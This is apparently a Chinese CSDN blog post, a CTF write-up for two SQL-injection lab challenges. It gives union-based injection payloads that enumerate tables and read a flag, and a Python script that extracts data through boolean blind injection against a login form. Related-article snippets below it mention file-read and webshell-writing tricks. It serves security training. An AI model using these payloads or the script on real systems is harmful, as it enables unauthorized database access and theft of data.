《从0到1:CTFer成长之路》——SQL

最新推荐文章于 2022-04-07 16:48:45 发布
最新推荐文章于 2022-04-07 16:48:45 发布
阅读量762 收藏
点赞数
分类专栏: CTFer 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/123479260
版权

SQL1:

首先判断有无过滤或者过滤了哪些东西。

首先尝试1‘ --+,发现有回显,说明—+没有被过滤,可以使用(也可以用%23)

先查看有几列:

1' order by 4 --+

到4的时候无回显,说明只有3列。

试着查看数据名。

-1' union select database(),2,3 --+

发现回显了2,3,所以再试一下放到前边。

-1' union select 2,3,database() --+

数据库名为note,接下来爆破表名。

-1' union select 2,3,group_concat(table_name) from information_schema.tables where table_schema="note" --+

猜测flag在fl4g中,接下来爆破列名。

最后在fl4g中查看fllllag。

-1' union select 2,3,fllllag from fl4g --+

得到flag。

SQL2:

进入后发现在login.php中可以输入账号密码,根据下方提示(如果觉得太难了,可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦)

在账号中存在sql注入。

首先查看有几列。

利用

admin' order by 3 #

发现在3之后回显的和之前不一样,所以判断有3列。

试了好多,发现select被过滤,但可以双写绕过。

看到了提示:

但在bp上我咋写都不成功,只能用脚本了。

在网上看到了很多师傅写的脚本都差不多。

import requests


def Get(url):
    result = ''
    for i in range(1, 100):
        left = 32
        right = 128
        mid = (left + right) // 2
        while left < right:
            # 查询表名
            # name = "admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables " \
            #        "where table_schema=database()),{0},1))>{1},1,0)#".format(i,mid)

            # 查询列名
            # name = "admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns " \
            #        "where table_schema=database() and table_name='fl4g'),{0},1))>{1},1,0)#".format(i,mid)

            # 根据表名和列名查询字段值
            name = "admin' and if(ascii(mid((Select flag from fl4g),{0},1))>{1},1,0)#".format(i, mid)

            data = {"name": name, "pass": "123456"}
            res = requests.post(url, data)
            if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in res.content.decode():
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        # 查询结果结束
        if mid == 32:
            break
        result += chr(mid)
        print(result)
    print(result)


Get('http://eci-2ze5rim9d48r8c0eppjn.cloudeci1.ichunqiu.com/login.php')#需要改动一下网址。

运行一下。

得到flag。

f0njl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
《从0到1:CTFer成长之路》afr_1
ZhShy
01-12 2006
文章目录靶场:afr_1知识点解题过程Flag:n1book{afr_1_solved} 靶场:afr_1 知识点 PHP向用户提供的指定待打开文件的方式,是一个文件流 PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。 http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码
《从0到1:CTFer成长之路》粗心的小李
ZhShy
01-09 495
靶场:粗心的小李 i春秋《从0到1:CTFer成长之路》 知识点 GitHack 下载:┌──(root????kali)-[/tools] └─# git clone git://github.com/lijiejie/GitHack.git 使用:┌──(root????kali)-[/tools/GitHack] └─# python2 GitHack.py 网址/.git/ 解题过程 使用GitHack扫描网址 ┌──(root????kali)-[/tools/Git
从0到1——CTFer成长之路(一)
youngerll的博客
03-08 3971
这里写自定义目录标题从0到1——CTFer成长之路(一)Docker安装 从0到1——CTFer成长之路(一) 此书将习题放在docker上,想做习题要先布置docker环境。 Docker安装 Windows商业版可以直接安装,懒得做系统,家庭版可以在VM虚拟机中直接安装。 下载ubuntu20系统及VM15; 安装docker。 ubuntu系统安装: 1.选择英语可以避免后期安装软件改文路径名称。 2.接着是漫长的等待; 3.等待完,右键桌面打开终端。 4.docker安装 ①终端apt
《从0到1:CTFer成长之路》书籍配套题目:[第一章 web入门]SQL注入
weixin_43868349的博客
03-14 302
本次做题主要是记录一下手注的过程,同时回顾一下相关内容。 题目 进入环境 首先尝试找到注入点; 用and 1=1 和 and 1=2进行尝试 之后就可以开始注入了;用order by获取字段个数; 确定回显位置; payload: ?id=-1' union select 1,2,3 %23 确定位置后就是获取数据库名; payload: ?id=-1' union select 1,database(),3 %23 接下来就是确定表名; payload: ?id=-1' union
2021-07-08 CTFer成长之路-SQL注入-总结
热门推荐
时光隧道
07-08 5万+
注入的功效 前面讲述了SQL注入的基础和绕过的方法,那么,注入到底有什么用呢?结合作者的实战经验,总结如下。 ❖ 在有写文件权限的情况下,直接用INTO OUTFILE或者DUMPFILE向Web目录写文件,或者写文件后结合文件包含漏洞达到代码执行的效果,见图1-2-53。 ❖ 在有读文件权限的情况下,用load_file()函数读取网站源码和配置信息,获取敏感数据。 ❖ 提升权限,获得更高的用户权限或者管理员权限,绕过登录,添加用户,调整用户权限等,从而拥有更多的网站功能。 ❖ 通过注入控制数据库查询出来
高教类课件:数据库技术及应用——SQL Server.zip
06-12
《数据库技术及应用——SQL Server》是一门高等教育课程,旨在教授学生如何使用SQL Server这一强大的关系型数据库管理系统。SQL Server是Microsoft公司推出的一款广泛应用于数据存储、管理和分析的软件,尤其在企业...
Mycat之——SQL拦截
12-14
其实,看到这个标题后,我本人也会提出一个疑问:SQL拦截到底有什么用呢?,接下来,就让我们带着这个疑问来阅读本文。 为何需要使用Mycat的SQL拦截功能? 首先,我们来列举一个真实的案例场景:我们在实际的工作中...
数据库技术及应用——SQL Server课件 1数据库系统概述.ppt
01-21
【数据库技术及应用——SQL Server课件 1数据库系统概述.ppt】 这是一份关于数据库技术及应用的课程材料,特别关注SQL Server数据库系统。在本课件中,讲解了数据库系统的基础概念,包括信息、数据、数据处理,以及...
数据库系统概论:第4章 关系数据库标准语言——SQL语言1.ppt
06-02
数据库系统概论:第4章 关系数据库标准语言——SQL语言1.ppt
数据库技术及应用——SQL Server课件 7索引.ppt
01-21
【数据库技术及应用——SQL Server课件 7索引】 在数据库管理中,索引是一种至关重要的技术,特别是在SQL Server这样的关系型数据库管理系统中。索引的作用在于提高数据查询的效率,通过预先组织数据,使得数据库...
《从0到1:CTFer成长之路》2.1 SSRF漏洞
ZhShy
01-15 4926
文章目录2.1.1 SSRF的原理解析2.1.2 SSRF漏洞的寻找和测试2.1.3 SSRF漏洞攻击方式2.1.3.1 内部服务资产探测2.1.3.2 使用Gopher协议扩展攻击面1. 攻击Redis2. 攻击MySQL3. PHP-FPM攻击4. 攻击内网中的脆弱web应用 SSRF(Server Side Request Forgery,服务端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞。因为请求是由内部发起的,所以一般情况下,SSRF漏洞攻击的目标往往是从外网无法访问的内部系
CTF从零到SQL注入攻击
山兔的博客
09-12 440
1.SQL注入攻击是开发者在开发程序时,对客户输入的参数过滤不严格,导致用户能更改数据库。 一.数字型注入: 1.访问链接http://192.168.20.133/sqll.php?id=2的页面和http://192.168.20.133/sqll.php?id=3-1的页面一样,可以说明这个注入点是数字型注入。表现为源码输入点“$_GET['id']”附近没有引号包裹。 2.链接模板:http://192.168.20.133/sqll.php?id=1 union select user,pwd f
从0到1CTFer成长之路-第一章-CTF中的SQL注入
黑白的博客
03-01 1920
CTF中的SQL注入 声明 好好向大佬们学习!!! 攻击 https://book.nu1l.com/tasks/#/pages/web/1.2 SQL注入-1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 开启docker .
《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集
Senimo
12-21 2111
《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集 启动环境: 提示为敏感文件,首先对网站目录进行扫描: 得到如上页面,首先访问robots.txt页面: 得到flag1在/flag1_is_her3_fun.txt页面中,访问: 得到第一部分的flag,再访问index.php~页面: 得到第二部分的flag2,最后访问.index.php.swp,下载得到: 使用记事本或word打开,得到flag3: 拼接后得到完整的flag: n1book{info_1s_v3ry_i
0到1 ctfer: SQL注入-2
Zeker62的博客
08-31 1933
分析这个靶场 : 登录靶场,只有一个空空的界面: 很明显,这是一个登录到账号密码的关于SQL注入的题目 尝试输入admin和其他用户名,发现是不一样的报错: 说明这里的机制是:先检查账号是否存在,再检查账号和密码是否对应 由此可以使用burpsuite抓包进行报错注入的操作: 经过抓包,在burp上显示不同的内容: “账号不存在” “账号和密码错误” 所以由此可以判断出,账号密码是否正确,来源于报错: 用户名正确报错:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5
【愚公系列】2023年05月 Web渗透测试之SQL注入(sqli-labs、Less-1)
时光隧道
07-14 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。order by -- + 判断字段数目union select -- + 联合查询收集信息。
SQL实战 11.高频SQL面试题 课程订单分析系列
Transkai
06-25 609
课程订单分析系列(一) 描述 有很多同学在牛客购买课程来学习,购买会产生订单存到数据库里。 有一个订单信息表(order_info),简况如下: 第1行表示user_id为557336的用户在2025-10-10的时候使用了client_id为1的客户端下了C++课程的订单,但是状态为没有购买成功。 第2行表示user_id为230173543的用户在2025-10-12的时候使用了cli...
《从0到1:CTFer成长之路SQL注入-1
tr_trTTT的博客
04-07 4129
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境 题目已经明确告诉我们是SQL注入了,我们直接就看一下哪里会存在注入点。 网址存在id=1,可能存在注入点,手工一下看看是否存在。 先用 ' 试一下,返回了一个错误页面,说明存在sql注入,再用and 1=1 试一下,返回正确的页面,那我们再次试一下and 1=2,返回的是错误的页面; ...
从0到1:CTFer成长之路 sql注入1
最新发布
07-27
CTFer成长之路中,SQL注入是一个重要的技术点。SQL注入是一种利用用户输入数据不当,从而欺骗数据库执行恶意操作的攻击方式。在CTF比赛中,了解和掌握SQL注入技术可以帮助你解决一些与数据库相关的题目。 首先,你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值